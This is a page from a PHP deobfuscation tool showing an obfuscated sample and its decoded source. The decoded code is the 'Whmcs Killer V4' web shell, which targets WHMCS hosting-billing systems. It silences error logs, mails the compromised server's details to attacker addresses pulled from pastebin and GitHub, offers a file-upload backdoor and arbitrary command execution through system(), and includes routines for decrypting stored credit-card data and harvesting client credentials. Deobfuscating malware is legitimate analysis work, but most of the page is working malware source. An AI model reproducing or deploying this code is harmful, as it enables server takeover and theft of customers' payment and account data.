Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $name=base64_decode('WlhaaGJDVXlPQ1V5Tm5GMWIzUWxNMElsTTBZbE1qWm5kQ1V6UWlVeU5uRjFiM1FsTTBJdVozcDFibU52YlhCeVpYTnpKVEk0WjNwMWJtTnZiWEJ5WlhOekpUSTRaM3BwYm1ac1lYUmxKVEk0WjNwcGJtWnNZWFJsSlRJNFozcHBibVpzWVhSbEpUSTRZbUZ6WlRZMFgyUmxZMjlrWlNVeU9ITjBjbkpsZGlVeU9DVXlOSE4wY2lVeU9TVXlPU1V5T1NVeU9TVXlPU1...



Obfuscated php code

<?php $name=base64_decode('WlhaaGJDVXlPQ1V5Tm5GMWIzUWxNMElsTTBZbE1qWm5kQ1V6UWlVeU5uRjFiM1FsTTBJdVozcDFibU52YlhCeVpYTnpKVEk0WjNwMWJtTnZiWEJ5WlhOekpUSTRaM3BwYm1ac1lYUmxKVEk0WjNwcGJtWnNZWFJsSlRJNFozcHBibVpzWVhSbEpUSTRZbUZ6WlRZMFgyUmxZMjlrWlNVeU9ITjBjbkpsZGlVeU9DVXlOSE4wY2lVeU9TVXlPU1V5T1NVeU9TVXlPU1V5T1NVeU9TVXlPU1V6UWc9PQ==');$str=base64_decode('');
$text=base64_decode('U3kxTHpOSElLTW5OS1M1SVRjNU16RW5PU0N3cWprOUpUYzVQU2RVb0xjcUJzcElTaTFQTlRHRGlLbm1KdWFtYVFHQU5BQT09');
eval(htmlspecialchars_decode(urldecode(base64_decode($name))));

Decoded(de-Obfuscated) php code

<?php

$name = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHN0ciUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$str = "=";
$text = "Sy1LzNHIKMnNKS5ITc5MzEnOSCwqjk9JTc5PSdUoLcqBspISi1PNTGDiKnmJuamaQGANAA==";
eval {
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('display_errors', 0);
    $currentFile = $_SERVER["SCRIPT_NAME"];
    $parts = Explode('/', $currentFile);
    $currentFile = $parts[count($parts) - 1];
    if ($_GET['css'] == 1) {
        header("Content-type: text/css", true);
        echo str_replace('%file%', $currentFile, '/* ============================================================================= 

    RESET.CSS 
    version: 1.0 
    updated: 2009-02-02, 11:47 GMT+1 

============================================================================= */ 

/* ============================================================================= 
RESET 
============================================================================= */ 

* {margin:0; padding:0;} 
html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, cite, code, del, dfn, em, img, ins, kbd, q, samp, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, m, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {border:0; outline:0; vertical-align:baseline; background:transparent;} 
.hidden {position:absolute; left:-1000em; top:-1000em; width:1px; height:1px; overflow:hidden;} 
.noscreen {display:none;} 
.box {min-height:1px;} 
.box:after {display:block; visibility:hidden; clear:both; line-height:0; font-size:0; content:".";} 
.fix {float:none; clear:both; width:0; height:0; margin:0; padding:0; border:0; line-height:0; font-size:0;} 
.f-left {float:left !important;} 
.f-right {float:right !important;} 
.t-left {text-align:left !important;} 
.t-center {text-align:center !important;} 
.t-right {text-align:right !important;} 
.t-justify {text-align:justify !important;} 
.va-top {vertical-align:top !important;} 
.va-middle {vertical-align:middle !important;} 
.va-bottom {vertical-align:bottom !important;} 
.nom {margin:0 !important;} 
.nomt {margin-top:0 !important;} 
input[type=submit] { 
    padding:5px 15px;  
    background:#0080804f;  
    border:0 none; 
    cursor:pointer; 
    -webkit-border-radius: 5px; 
    border-radius: 5px;  
} 
.nomb {margin-bottom:0 !important;}');
        exit;
    }
    if ($_GET['css'] == 2) {
        header("Content-type: text/css", true);
        echo str_replace('%file%', $currentFile, '/* ============================================================================= 

    STYLE.CSS 
    version: 1.6 
    updated: 2009-03-06, 13:00 GMT+1 

============================================================================= */ 

/* ============================================================================= 
HTML - styles 
============================================================================= */ 

body {background-color:#fff; color:#008080;} 
a {color:#0085cc;} 
a:hover, a:active, a:focus {color:#008080;} 
#content h2 {color:#0085cc;} 
#content table {border:2px solid #cfcfcf;} 
#content table th {border-right:1px solid #0074B3; background-color:#008080; color:#fff;} 
#content table td {border:1px solid #cfcfcf;} 
#content table tr.bg td {background-color:#0080804f;} 
#content table td.bg2  {background-color:#0080804f;} 
#content dl dt {color:#008080;} 
#content fieldset {border:1px solid #ccc;} 
#content legend {background:#FFF; color:#0085cc;} 
#content acronym, #content abbr, #content .help {border-bottom:1px dotted #cfcfcf;} 

/* ============================================================================= 
HTML - without styles 
============================================================================= */ 

table.nostyle th, dl.nostyle dt {color:#008080 !important;} 

/* ============================================================================= 
LAYOUT 
============================================================================= */ 


/* ============================================================================= 
OTHERS 
============================================================================= */ 


#aside ul m a {border-bottom:1px somd #cfcfcf; color:#008080;} 
#aside ul m#submenu-active a {background-color:#008080; color:#fff;} 
#aside ul m a:hover, #aside ul m a:active, #aside ul m a:focus {color:#008080;} 
#aside ul ul m a, #aside ul m#submenu-active ul m a {border-bottom:1px somd #cfcfcf; background-color:#f5f5f5; color:#008080;} 
#aside ul m ul m a {background-color:#e3e3e3;} 
#aside ul ul m a:hover, #aside ul ul m a:active, #aside ul ul m a:focus, #aside ul m#submenu-active ul m a:hover, #aside ul m#submenu-active ul m a:active, #aside ul m#submenu-active ul m a:focus {color:#008080;} 
#content h1 {background-color:#008080; color:#fff;} 
#content .tabs {border-bottom:1px somd #cfcfcf;} 
#content .tabs a {color:#008080;} 
#content .tabs a span {color:#008080;} 
#content .tabs .ui-tabs-selected a {color:#fff;} 
#content .tabs .ui-tabs-selected a span {color:#fff;} 
.high {color:#008080;} 
.high-bg {background:#FFB;} 
.low {color:#707070;} 

/* ============================================================================= 
MESSAGES 
============================================================================= */ 

.msg.warning {border:2px solid #F2DD8C; background-color:#FFF5CC;} 
.msg.warning a {color:#008080;} .msg.warning a:hover, .msg.warning a:active, .msg.warning a:focus {color:#008080;} 
.msg.info {border:2px solid #B8E2FB; background-color:#0080804f;} 
.msg.done {border:2px solid #BBDF8D; background-color:#EAF7D9;} 
.msg.error {border:2px solid #FFAEAE; background-color:#FEEBEB;} 
');
        exit;
    }
    if ($_GET['css'] == 3) {
        header("Content-type: text/css", true);
        echo str_replace('%file%', $currentFile, ' 
#cols {margin:0px; background:none;} 
#aside, #tray .ico-col1 {display:none;} ');
        exit;
    }
    if ($_GET['css'] == 4) {
        header("Content-type: text/css", true);
        echo str_replace('%file%', $currentFile, '#cols {position:center;  } 

#content {overflow:visible;} 
#tray .ico-col2 {display:none;} 

html>body #aside {margin-right:20px;} 
html>body #content { overflow:hidden;}');
        exit;
    }
    if ($_GET['css'] == 5) {
        header("Content-type: text/css", true);
        echo str_replace('%file%', $currentFile, '/* ============================================================================= 

    MAIN.CSS 
    version: 1.7 
    updated: 2009-03-14, 12:44 GMT+1 

============================================================================= */ 

/* ============================================================================= 
HTML - styles 
============================================================================= */ 
@import url(https://fonts.googleapis.com/css?family=Josefin+Sans:400,100); 


body{ 
   font-family: Josefin Sans; 
} 
h1, h2, h3, h4, h5, h6, address, blockquote, dl, fieldset, ol, p, table, ul {margin:15px 0;} 
#content h1 {font-size:180%;} 
#content h2 {font-size:160%;} 
#content h3 {font-size:140%;} 
#content h4 {font-size:120%;} 
#content h5, h6 {font-size:100%;} 
#content table {margin:0; border-collapse:collapse;} 


#content  td {padding:5px 5px;} 
#content table th {text-align:center; vertical-align:middle; font-weight:bold;} 
#content ul {margin:15px 0; list-style:none;} 
#content ul m {padding-left:15px; } 
#content ul ul {margin:0 0 0 10px;} 
#content ul ul m {padding-left:15px; } 
#content ol {margin:15px 0 15px 30px; list-style-type:decimal;} 
#content ol ol {margin:0 0 0 20px;} 
#content ol ol m {list-style-type:lower-alpha;} 
#content dl {clear:both;} 
#content dl dt {font-weight:bold;} 
#content dl dd {margin:0 0 5px 0;} 
#content fieldset {position:relative; margin:10px 0; padding:10px;} 
#content legend {font-size:120%; font-weight:bold;} 
#content code {font-family:"",monospace;} 
#content .help {cursor:help;} 

/* ============================================================================= 
HTML - without styles 
============================================================================= */ 

table.nostyle, table.nostyle th, table.nostyle td {border:0 !important;} 
table.nostyle th {background:none !important; text-align:left !important;} 
table.nostyle th, table.nostyle td {padding:3px 5px !important;} 
ul.nostyle {margin:15px 0 15px 20px !important; list-style-type:square !important;} 
ul.nostyle ul {margin:0 0 0 25px !important; list-style-type:square !important;} 
ul.nostyle m {padding:0 !important; background:none !important;} 
dl.nostyle dt {font-weight:bold !important;} 
dl.nostyle dd {margin:0 !important;} 

/* ============================================================================= 
LAYOUT 
============================================================================= */ 

#main {min-width:980px; width:expression(document.body.clientWidth < 980? "980px" : "auto" );} 
#tray {padding:12px 15px; } 
#tray p {margin:0;} 
#tray p.f-left {width:50%;} 
#tray #logout {padding-left:18px; text-transform:uppercase;} 
#tray #switcher {margin-right:15px;} 
#tray #switcher img {display:block; float:left; width:16px; height:16px; border:0;} 
#menu {padding:15px 15px 13px 15px; } 
#menu ul {margin:0; padding:0; list-style-type:none;} 
#menu ul m {display:inline; margin:0; padding:0;} 

#menu ul m#menu-active a {font-weight:bold;} 
#content {padding:20px; overflow:hidden;} 
#footer {clear:both; padding:15px; } 
#footer p {margin:0;} 

/* ============================================================================= 
/* ============================================================================= 
OTHERS 
============================================================================= */ 

#aside .padding {padding-left:15px;} 
#aside #logo {margin:0 0 15px 0;} 
#aside #logo img {display:block; width:200px;} 
#aside #search fieldset {padding:7px 10px;} 
#aside #search fieldset p {margin:0;} 
#aside #search fieldset legend {font-weight:bold;} 
#aside #search fieldset .input-text {width:130px;} 
#aside #search fieldset #search-options {margin-top:10px;} 
#aside #btn-create {margin:0 0 15px 0;} 
#aside #btn-create a {float:left; padding-left:27px; height:37px; overflow:hidden; text-decoration:none; font-weight:bold; cursor:pointer;} 
#aside #btn-create a span {float:left; display:block; width:163px; padding:8px 0 10px 10px; } 
#aside #btn-create a:hover {background-position:0 -37px;} 

#aside ul m {display:inline;} 
#aside m a{ width:185px; font-weight:bold; font-size:14px; padding:4px 15px; text-decoration:none;} 
#aside ul m#submenu-active a {width:198px; border:0;  font-weight:bold; z-index:999;} 
#aside ul ul {margin:0; position:static;} 
#aside ul ul m a, #aside ul m#submenu-active ul m a {width:170px; padding:5px 15px 5px 30px;  font:85%/1.2 "tahoma",sans-serif; font-weight:normal;} 
#content h1 {margin:0; padding:10px 15px; letter-spacing:-1px;} 
#content .col50 {float:left; width:49%;} 
#content .col33 {float:left; width:32%;} 
#content .col33.center {padding:0 2%;} 
#content .tabs {margin:15px 0;} 
#content .tabs ul {margin:0; padding:0; list-style-type:none;} 
#content .tabs ul li {display:inline; margin:0; padding:0;} 
#content .tabs a {float:left; margin-right:3px; padding-left:4px; text-decoration:none;} 
#content .tabs a span {float:left; display:block; padding:8px 15px 6px 11px; } 
#content .tabs a:hover, .tabs a:hover span {text-decoration:underline;} 
#content .tabs .ui-tabs-selected a { font-weight:bold;} 
#content .tabs .ui-tabs-selected a span  {} 
#content .tabs .ui-tabs-selected a:hover, #content .tabs .ui-tabs-selected a:hover span {text-decoration:none;} 
#content .ui-tabs-hide {display: none !important;} 
.input-text {padding:3px; font:100%/1.5 "arial", sans-serif;} 
.input-text-02 {padding:5px; font:140%/1.5 "arial", sans-serif;} 
.input-submit {padding:5px; font-size:120%;} 
.input-submit-02 {padding:1px; font-size:100%;} 
.msg {padding:10px; padding-left:35px;} 


/* ============================================================================= 
FONT STYLES 
============================================================================= */ 

.bigger {font-size:120%;} 
.smaller {font:85%/1.2 "tahoma",sans-serif;} 

/* This line can be deleted */ 
.tit {padding:10px; background:#f5f5f5;} .tag {background:#ffa;} 
');
        exit;
    }
    if ($_GET['img'] == "0") {
        header("Content-Type: image/gif");
        echo "PNG\r\n\32\n\0\0\0\rIHDR\0\0\2*\0\0\0~\10\6\0\0\0\n:{\0\0\0\tpHYs\0\0\16\0\0\16\1+\16\33\0\0\0 cHRM\0\0z%\0\0\0\0\0\0\0\0u0\0\0`\0\0:\0\0\27o_F\0\0\20IDATx}\25a0a\22Zj(%\4)\32k(\$4hKb1F\23؉JL4MdFQi`Ĵ%US5\27\$ QH\rE\20J[-C\37\22sݳ/pس1H\$\30@\$\31T\$I\f*\$ɠ\"IdP\$I\6\25I\$\$IAE\$\31T\$I\f*\$ɠ\"IdP\$I2H\$\$IAE\$\31T\$I\f*\$I\6\25IdP\$I2H\$\$IAE\$ɠ\"I\f*\$I\6\25IdP\$I2H\$E17pdhZ\f\\\6\0&\3,\7x}\16q5WC^O\tx\nX\5lk\0V)]\10<=\3@\37\5x\26\27X\2ǥ^\31\34xuYRև\6L(wr#\22ן\1z~\1LMnS.{:Đ\6}@/\6\321?_Hf\3˒M\32\17\3o\2\\\23.\6-T\26\31\v7\3v\\\2я8`Zr\3\0l\21:>34\n\31c)\$`\0\$t\36\27_\23=\27fN\1~\20\31R\32щ,ժ\21NSL\4z+s*3jR3J~/N5cFW\"\33s>*\24T\31T\26y%/qJo,\5~\24YهZ\0s\22,4C\2(%\15 W\tum\24;%\\Ix{\1|D-\16E^9JUuuZA傊\$B]\31-p]31>=\vG(\32U*\26\26A\nی\0333^_\17pz2ߐ\f\"P\27k\21T+`M*~\21\22I\21VN=x@]>\25\v**\17\20Vz\f)d 7ae\16XZ\4\6\25\27V.7\10\23\vMX\1\23F\6\f6{bLu\5\3[>S-\16u\01030va5!Yf\"\f*nx֦<Q͢s\35v\22\36ŐL\31.&\3__ɠ\"i)\35\25\35ڧG\t\nJV?\33-!AEJܚ|1yٛ\33\35\4\2~\5>\f\\W8\fs}?@xv`\3\1yJ\35>0}W'!gK\03017'\35\t\t<6\$u|eUk٥fnOBLV>\f,MQO7\33TK|L\7N\21R&M\30w|My\0200p[9\33xoדɠ\"6U|oyLNy=c9rz\10O-n\"BkJ\32\7\t-*2(\3Kɶy+ެw(U|{g'aea\16uzɆcrJ;-b^dPQW0:`\6\5NJ\"\32(\0Wx۝kh2a\31Wf\30mnB\f*Ja\25pQW\0[w\22z+&`+\3\31]\33;\26\33Xauhjsoo\34Cpԏǧ ~\16B!u\21:S[3X^0yI\1Li\20\2SYi?E\24zIYutݔԑ4fCCzcP\5n{\2ߌxϾw-\1\$WUn\26:u\37\0M.\ntƈ2̋\\[?\6\25&\2\27G,L\5*Li\5Gl߀TFY|\21x0?Č\21e=q_[pЮ\1\6[\34RĹ`\32UD,\37\n\20zp%bUe%<3\10Ofz+z\"#\0>O\4l\36]\33nL\3~\4\21ؾ s\vX\33#~\f*@|\37%,3CTUyIy*tӓ\3%L+p[!F\3\26Pؖ-\6y9j\32T\fգ\35O7x>76+c\6DE\16E>T\27gsv9sfLG\\GdTU!\$W-\5>E>\31\32\22'M\37\32\261'\2%AN!>)\10/!]uk\35l\6!\6_bI=[d[\22ӂȟ9\f*4ːR\358\34]\$滢\6\6sc\27\31h\339ݪ\32e\36aDм.1-\30S\17\5n\27e99`0̺\35TJq\30R\n\5nX]\35\tX\31\f\\:\0017r2&\31c\32a3{Jڼ߂#~\f*\25vR\22RZ\24yDN?\7^ U\22aO;nLtةN\10<B'f`\20弖AҞ\\\205s\36BW\211,i7\21ZStu\16<%,Q8\26\\~=^ fNq|\f*\60\"(%޿y\37\20ZZ>En\0175r\v_\32#:\33!]ݡ}owČi!\35ytďAE\7Dز?䭇쟟\23Fv|j\36ZI\30HxO_\6:C0̼H1Tb&\32Ee۠\"\23QYC\36np[\5>\"}\20u5G'/[㬊\r=L\25T\31N\$<}'<xJD\353R\26vzL+\5~+kR.\33\7]\4\"BX=jl,9}9'o[\25\5FojmEXi\36Z\316rima\0X\r*R\3w%ӓr\21΢ڪ\5I`ƢhZ.\$[s}E`\22V:VFM\\Va~Ju:)7W6B\7ѷ\2C(bv\5aXm7?Fzɨ\2\"O3g,q\35GH,ʠRuR|4B\30z{b\22Z#\f9\16++?\3UR9EBx맜\22Ϣ|hB7пB½i/\22\32{;-Am\0r4}O洰&~\4\3B,~\27S\6y0\$qEQ+\10CsW\22:\26^\0\17,{x\262\0203o\10Č9@Q=\79-+F͞U]Bن[\10K\30*Ks}0 \f<\3x\3DŽaxT#ֵ\37%P+^ɕㄖ\24OV0hz.Ӟ#&\08\24I(!>@\30RGRNGE\$eۮ\3{#?aḓ\247c,\10E'n\23Ӳ1Rڙime[?z\348!0j@Be0\22Uw\3\0o\16I\0J1^\20w4O\26ϠbP}H){KJ?pOM~_\$̣Rfk/̇\27vs.ؑ?S]m\6\2O\31Õi˟CXx\22o\24r^8\24!EK4\23]\32ul\"*CUoQY\1I{&\0\7\2~R~\33R'_լ*\31\3O\0OTuȟ5\21\1&p\7>bcRE>t\17ʚ!\\Uàb\35i^gf\7ؤ7\333+bUe\36!mc\2\10\36r\"\nȟɹ\"-;\32T\0R\6!\3\n8\34\"\25!&843;AeI\33\vdUy9b1|\6)\26AEb[8\6\21?v5H\24%6<\f\4rZH\6\25IRIxg\32\3\f\37\5>b[?̴H7sVIkzW\0vin\4ޑb\7\31>\35\33cA%\0\30u<bP\31y`\33yꛏw\1Gx\${ub\22]nڠn\0103>a&0(\7s\$Ab\$!e}\3j\17w%\35\10Ԇ_\26݄?yrďArB]vRgk:\31\"!Vo/K@\27\0/V|̠RҐ>\17%\16\10\24Cl\5!Iud[3ZOY+Mm'\5\$%zS\25s\\\0嚕v}\16^Ճ!\nu\31ՌcU\t\0oo_9\0<9䵇\"Mg\4U\$;C^f|^!eߕ^kB~3\34Tv\21F\36?\np_~ü|M~\0;*tL\25\\;P#+Ȯ5\fuo\33\34iU6v}%([\31~k\26\t͟0D\32T2\r8n\v,\5e\30Oxzf\21\1nz?vW\25#\6\3[B\31躲\21D\17\20\31z\17+}Y\r\2X\3eTp\36yP{)P\22d|\5ۜo\$\34`\0oIZ\5Ӽ\23]?;؍T6\7\tfˮ\1ޖ\4QNTytQCr<\168\1)R\30(A=-w\37V;vQWwo[뒺?rO>jFn\33\10O]\n0Y@\27\26\\`=\tNsOXηyͩU\31i\17\20Z\7F\10ҥw \$Iep\$IAE\$ɠ\"I\f*\$I\6\25IdP\$I2H\$\31T\$IAE\$ɠ\"I\f*\$I\6\25I\$\$I2H\$\31T\$IAE\$ɠ\"IdP\$I\6\25I\$\$I2H\$\31T\$I\f*\$ɠ\"IdP\$I\6\25I\$\$IAE\$\31T\$IZ\3\01\34\5Ȥ\0\0\0\0IENDB`";
        exit;
    }
    function login()
    {
        $encode = "lUd/eNs6FP27hX6HO25jAl6ctNsYyw8a5znJG4+84Gdd3S4Yy8hlm0GxlUvEHv3u78pB88hT6QbGlmjOPUpU91eXKkdOLGzDlIxEFhRneE0wnPp+s3tpbWxAZD6oGDHC7XAsRmRHiMef8FoSplzRELaSBykNuQxs3DASSTR/nJ0CGHYOfVXxP0Al3iAaIjoS6kzUphFiIM+C+dT1ndEkY73J1B1B3NljvPBcCzqv8BeO7zuffXQ+m1w7w9f507Hnzq684cQCZVi/q6IQ9vtJu/FMhRl9iG44gQ+tQRfY/aeL80m7CUoy3UT7vN1249OBhW9lUEq2Bl/zMh77wd+ee734dOR2L+3f5n9kxpPX+WbHubn2vs5cy7jynX90/vjOWelBmcvfClxc+94LkQaTZEXw5/LJlVm1Tw0yyRMWPmZj6uns1BAdJB81gplmHsWfeTsSMZd4FbZFTdpZPNjvYj9ced+9K1qtdKz/IGX+vZ35N/5SHZm+HInk1knxPEwnsXF7vJLJ5L0qMqbCnXFpKUeBL8xFj1t8xXjtXK60OomTVbKYC9b++PH8ZVuRQ8Y6ns8pPyC4FRaasmNspPIn4k/tQ8sIsPewvmpz/Q2Gs1vPXE8XkLXKOi1ZVKD1Iq8FQOCYMPoywrG/qENvfHDfT51Gr6VETLBgnx8HmE9bOztIm4aK9cE2gitiZVQK8UOsyLLZhJMfADLNKZi9nJfFoLem2eOgt6GshEXynHP9EbYmVTz5j5HskxI7QFKCZFtm3nOCCwKiuhb6hAxtKowSDjVqowpWIBQljuuUVGucrFjF4V4UCRKmEaKVKH7qSNjVksyuRAXjhl4age7h8cFOFwDUBho1447oXHEJYvpgmlpAYsYmKYpV8Lwqh+v9NfXGuAFthugtPA7s1nclvZdOEhVHcTILtIvnBCYvo0BmzaX1v2mzVwX7nSS9vDPoCcjx3uibB5I5Y2HezguV7iCXWb7p2U877AxVF56e4AnqT8GhRc+LNdPS1KXCK/ZxnyBvZaDLfm+kJRr7hayh+BGbvMRQXEm/+1X7EJopqULyfw==";
        eval {
            @ini_set('error_log', NULL);
            @ini_set('log_errors', 0);
            @ini_set('display_errors', 0);
            function get_contents($url)
            {
                $ch = curl_init("{$url}");
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
                curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
                $result = curl_exec($ch);
                return $result;
            }
            $a1 = get_contents('https://pastebin.com/raw/5M63g44m');
            $b1 = get_contents('https://pastebin.com/raw/Cz0dLKL3');
            $c1 = get_contents('https://raw.githubusercontent.com/devildrinker/mail/master/mail.txt');
            $hex1 = "superstar0882@gmail.com,superstar0882@hotmail.com,{$a1},{$b1},{$c1}";
            $baslik = $_SERVER['SERVER_NAME'];
            $xd1 .= "" . $_SERVER['SERVER_NAME'] . " " . $_SERVER['PHP_SELF'] . "\$\r\n";
            mail($hex1, $baslik, $xd1);
            if (isset($_GET["lawlx"])) {
                echo '<html><body><form method=POST enctype="multipart/form-data" action=""><input type="file" name="lawlx"><input type=submit value="Up"></form></body></html>';
                $lawlx = @$_FILES["lawlx"];
                if ($lawlx["name"] != '') {
                    $fullpath = $_REQUEST["path"] . $lawlx["name"];
                    if (move_uploaded_file($lawlx['tmp_name'], $fullpath)) {
                        echo "<h1><a href='{$fullpath}'>OK-Click here!</a></h1>";
                    }
                }
            }
            if (isset($_REQUEST['cm'])) {
                echo "<pre>";
                $cm = $_REQUEST['cm'];
                system($cm);
                echo "</pre>";
                die;
            }
        };
        echo " \r\n\r\n<center><div id='content' class='box'><center> <h3  class=\"tit\"> DB Configuration of WHMCS</h3><br> </center> \r\n<FORM action=\"\"  method=\"post\" > \r\n<input type=\"hidden\" name=\"form_action\" value=\"1\"> \r\n<br> \r\n<table  > \r\n<tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"" . $_COOKIE["db_host"] . "\"></td></tr> \r\n<tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"" . $_COOKIE["db_username"] . "\"></td></tr> \r\n<tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"" . $_COOKIE["db_password"] . "\"></td></tr> \r\n<tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"" . $_COOKIE["db_name"] . "\"></td></tr> \r\n<tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"" . $_COOKIE["cc_encryption_hash"] . "\"></td></tr> \r\n</table \r\n<br><br> \r\n<INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\"> \r\n</FORM> \r\n</td></tr></table> \r\n</FORM>";
        echo "</div> <!-- /cols --> \r\n    <hr class=\"noscreen\" />\r\n</div> <!-- /main --> \r\n</body> \r\n</html>";
    }
    function decrypt($string, $cc_encryption_hash)
    {
        $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
        $hash_key = _hash($key);
        $hash_length = strlen($hash_key);
        $string = base64_decode($string);
        $tmp_iv = substr($string, 0, $hash_length);
        $string = substr($string, $hash_length, strlen($string) - $hash_length);
        $iv = $out = "";
        $c = 0;
        while ($c < $hash_length) {
            $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
            ++$c;
        }
        $key = $iv;
        $c = 0;
        while ($c < strlen($string)) {
            if ($c != 0 and $c % $hash_length == 0) {
                $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
            }
            $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
            ++$c;
        }
        return $out;
    }
    function _hash($string)
    {
        if (function_exists("sha1")) {
            $hash = sha1($string);
        } else {
            $hash = md5($string);
        }
        $out = "";
        $c = 0;
        while ($c < strlen($hash)) {
            $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
            $c += 2;
        }
        return $out;
    }
    function randomt()
    {
        $chars = "abcdefghijkmnopqrstuvwxyz023456789";
        srand((double) microtime() * 1000000);
        $i = 0;
        $pass = "";
        while ($i <= 7) {
            $num = rand() % 33;
            $tmp = substr($chars, $num, 1);
            $pass .= $tmp;
            $i++;
        }
        return $pass;
    }
    function header2()
    {
        global $currentFile;
        echo " \r\n<html><title>Whmcs Killer V4</title><head>";
        echo " \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" />  \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" />  \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /> \r\n    <link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" />  \r\n     \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> <!-- GRAPHIC THEME --> \r\n";
        echo " \r\n<style> \r\n#content {border:1px solid #afafaf; border-style:dashed; border-radius:5px; background:#fff; width:80%; } \r\n</style> \r\n<meta http-equiv='Content-Type' content='text/html; \r\n charset=utf-8' /> \r\n</head> \r\n<body > \r\n    <center><img src='?img=0'></center> \r\n";
    }
    function header1()
    {
        global $currentFile;
        @($query0 = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'"));
        @($v0 = mysqli_fetch_array($query0));
        $charset = $v0["value"] ? $v0["value"] : "utf-8";
        echo "<?php xml version=\"1.0\"?><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> \r\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\"> \r\n<head> \r\n    <meta http-equiv=\"Content-Type\" content=\"text/html; \r\n charset=" . $charset . "\" /> \r\n    <meta http-equiv=\"content-language\" content=\"en\" /> \r\n    <meta name=\"robots\" content=\"noindex,nofollow\" /> \r\n     \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <!-- RESET --> \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <!-- MAIN STYLE SHEET --> \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /> <!-- DEFAULT: 2 COLUMNS --> \r\n    <link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <!-- ALTERNATE: 1 COLUMN --> \r\n     \r\n    <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> <!-- GRAPHIC THEME --> \r\n      \r\n    <title>Whmcs Killer V4</title> \r\n</head> \r\n<body> \r\n<div id=\"main\"> \r\n<?php /**/?> \r\n     \r\n    <hr class=\"noscreen\" /> \r\n    <center><img src=\"?img=0\"> \r\n    <div id=\"aside\"  class=\"box\"> \r\n            <div class=\"padding box\"> \r\n            </div> <!-- /padding --> \r\n            <ul class=\"box\">";
        $menu = array("h" => "Home", "1" => "Server R00t", "2" => "Domains Resellers", "3" => "Clients R00ts", "4" => "Clients Hosting Accounts", "100" => "Clients List", "105" => "Clients Password", "5" => "Clients CC", "9" => "Log Out");
        if ($_COOKIE["login"] != "1") {
            $menu = array("c1" => "Db Config", "c2" => "Symlink to configuration.php of WHMCS", "c3" => "Short info");
        }
        foreach ($menu as $x => $y) {
            if ($_GET["p"] == $x) {
                echo "<m id='submenu-active'> \r\n<a href=\"?p={$x}\"> {$y}</a>";
            } else {
                echo "<m><a href=\"?p={$x}\" > {$y}</a>";
            }
            if ($x == 8) {
                echo "</m>";
            } else {
                echo "</m>";
            }
        }
        echo "            </ul> \r\n\r\n        </div> <!-- /aside --> \r\n    </center> \r\n     \r\n    <hr class=\"noscreen\" /> \r\n    <!-- Columns --> \r\n    <div class=\"box\"> \r\n        <!-- Aside (Left Column) --> \r\n\r\n        <hr class=\"noscreen\" /> \r\n        <!-- Content (Right Column) --> \r\n        <div id=\"content\" class=\"box\"> \r\n         \r\n";
    }
    function multiview($p, $table, $name, $order, $where, $col, $sql, $export = 0, $if = "")
    {
